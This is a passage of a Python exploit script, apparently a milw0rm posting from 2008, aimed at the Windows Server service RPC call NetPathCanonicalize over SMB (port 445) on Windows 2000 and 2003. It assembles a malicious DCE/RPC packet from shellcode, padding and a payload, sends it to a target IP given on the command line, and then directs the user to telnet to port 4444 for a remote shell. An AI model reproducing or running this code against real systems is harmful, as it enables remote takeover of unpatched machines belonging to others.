 97 |  
 98 | class SRVSVC_Exploit(Thread):
 99 |     def __init__(self, target, osver, port=445):
100 |         super(SRVSVC_Exploit, self).__init__()
101 |         self.__port   = port
102 |         self.target   = target
103 |         self.osver   = osver
104 |  
105 |     def __DCEPacket(self):
106 |         print '[-]Initiating connection'
107 |         self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
108 |         self.__trans.connect()
109 |         print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
110 |         self.__dce = self.__trans.DCERPC_class(self.__trans)
111 |         self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
112 |          
113 |         # Constructing Malicious Packet
114 |         self.__stub='\x01\x00\x00\x00'
115 |         self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
116 |         self.__stub+=shellcode
117 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
118 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
119 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
120 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
121 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
122 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
123 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
124 |         self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
125 |         self.__stub+='\x00\x00\x00\x00'
126 |         self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
127 |         self.__stub+=payload
128 |         self.__stub+='\x00\x00\x00\x00'
129 |         self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
130 |         self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
131 |         self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
132 |         self.__stub+='\x01\x00\x00\x00'
133 |         return
134 |  
135 |     def run(self):
136 |         self.__DCEPacket()
137 |         self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
138 |         print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
139 |  
140 | if __name__ == '__main__':
141 |     try:
142 |         target = sys.argv[1]
143 |         osver = sys.argv[2]
144 |     except IndexError:
145 |         print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
146 |         print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
147 |         print 'Select OS Version'
148 |         print '[-]Windows 2000: OS Version = 1'
149 |         print '[-]Windows 2003[SP2]: OS Version = 2'
150 |  
151 |         sys.exit(-1)
152 |  
153 |     current = SRVSVC_Exploit(target, osver)
154 |     current.start()
155 | #print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
156 |  
157 | # milw0rm.com [2008-11-16]
158 | 


--------------------------------------------------------------------------------